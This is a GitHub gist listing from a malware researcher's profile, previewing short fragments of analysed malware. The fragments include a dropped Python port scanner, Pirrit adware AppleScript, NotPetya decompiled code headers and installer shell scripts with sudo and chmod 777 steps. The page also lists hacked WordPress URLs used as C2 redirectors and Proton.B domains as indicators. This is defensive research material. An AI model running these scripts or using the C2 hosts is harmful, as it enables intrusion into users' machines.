Skip to content

Instantly share code, notes, and snippets.

Amit Serper aserper

Block or report user

Report or block aserper

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:e36d382668c6cf2c996c5143025097c0
AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
@aserper
aserper / dropped_port_scanner.py
Created Jun 13, 2019
dropped python portscanner
View dropped_port_scanner.py
#! /usr/bin/env python
#coding: utf-8
import threading
import socket
from re import findall
import httplib
import os
from random import randrange
import random
@aserper
aserper / gist:cbcd0c8ecbda9398911ecaa1c7f2f71b
Created Mar 8, 2019
Hacked wordpress domains used as a C2 redirector
View gist:cbcd0c8ecbda9398911ecaa1c7f2f71b
http://printofcenter.pl/media/system/info.php?url=
http://printofcenter.pl/media/system/log.php?url=
http://moippo.org.ua/media/system/log.php?url=
http://moippo.org.ua/media/system/info.php?url=
http://nihir.org/wp-includes/rest-api/info.php?url=
http://nihir.org/wp-includes/rest-api/log.php?url=
http://airsoft.monokpeti.xyz/wp-includes/js/log.php?url=
http://airsoft.monokpeti.xyz/wp-includes/js/info.php?url=
http://asoftel.east.3cx.us/wp-includes/js/log.php?url=
http://asoftel.east.3cx.us/wp-includes/js/info.php?url=
@aserper
aserper / gist:d0f1f2eb66b582ca04f195707a8d0126
Created Jul 2, 2017
Form1 from Karo. NotPetya svchost.exe
View gist:d0f1f2eb66b582ca04f195707a8d0126
using ;
using ;
using ;
using ;
using ;
using IWshRuntimeLibrary;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;
using System;
using System.Collections.Generic;
@aserper
aserper / gist:43664a1daf7d309c46edc2f739d78ecd
Created May 9, 2017
domains from proton.b encrypted file
View gist:43664a1daf7d309c46edc2f739d78ecd
handbrakestore.com
handbrake.cc
luwenxdsnhgfxckcjgxvtugj.com
6gmvshjdfpfbeqktpsde5xav.com
kjfnbfhu7ndudgzhxpwnnqkc.com
yaxw8dsbttpwrwlq3h6uc9eq.com
qrtfvfysk4bdcwwwe9pxmqe9.com
fyamakgtrrjt9vrwhmc76v38.com
kcdjzquvhsua6hlfbmjzkzsb.com
ypu4vwlenkpt29f95etrqllq.com
View gist:573dcf3323b32d7ac701c3e9d6417596
61.132.163.68
202.102.192.68
202.102.213.68
202.102.200.101
58.242.2.2
202.38.64.1
211.91.88.129
211.138.180.2
218.104.78.2
202.102.199.68
View pirrit_applescript
global _pid
set _pid to "pid_value_to_replace"
repeat
«event XFdrIjct» {}
end repeat
on «event XFdrIjct» {}
delay 0.5
View setup.sh
#!/bin/bash
chmod +x install_updater.sh
./install_updater.sh $6
#save current dir position
curdir=`pwd`
user=`users | cut -f1 -d' '`
#if somebody disturbs /tmp using
View gist:c71765d5efe4bc26387573f4ce9f47f2
#!/bin/sh
function offer7000 {
whoami > /var/tmp/whoami.txt
sudo whoami > /var/tmp/suwho.txt
updFile="/var/tmp/updText.txt"
touch $updFile
sudo chmod 777 $updFile
sudo whoami >> $updFile
@aserper
aserper / gist:f7961e63a89c2c0a71149544d55ee39f
Created Apr 9, 2016
OS X pirrit new configuration Applescript - DONT RUN IT
View gist:f7961e63a89c2c0a71149544d55ee39f
global _pid
set _pid to "pid_value_to_replace"
repeat
«event XFdrIjct» {}
end repeat
on «event XFdrIjct» {}
delay 0.5
You can’t perform that action at this time.